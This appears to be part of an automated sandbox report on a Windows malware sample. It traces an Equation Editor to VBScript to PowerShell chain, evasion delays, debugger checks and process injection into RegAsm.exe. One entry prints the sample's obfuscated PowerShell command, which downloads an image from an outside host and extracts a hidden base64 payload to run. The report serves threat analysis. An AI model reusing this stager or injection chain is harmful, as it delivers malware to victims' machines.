                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F7E2 Sleep,ExitProcess,8_2_0040F7E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_0041A7D9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599859Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1479Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 512Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3665Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 541Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_8-53682
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3636Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3896Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3860Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep count: 512 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep count: 3665 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976Thread sleep time: -599859s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4020Thread sleep count: 541 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4020Thread sleep time: -1623000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3104Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4020Thread sleep count: 9437 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4020Thread sleep time: -28311000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3296Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2080Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044E8F9 FindFirstFileExA,8_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10006580 FindFirstFileExA,8_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599859Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00443355 mov eax, dword ptr fs:[00000030h]8_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10004AB4 mov eax, dword ptr fs:[00000030h]8_2_10004AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,8_2_00411D39
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434BD8 SetUnhandledExceptionFilter,8_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0043BB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_10002B1C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3800, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,8_2_0041812A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00419662 mouse_event,8_2_00419662
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" Jump to behavior
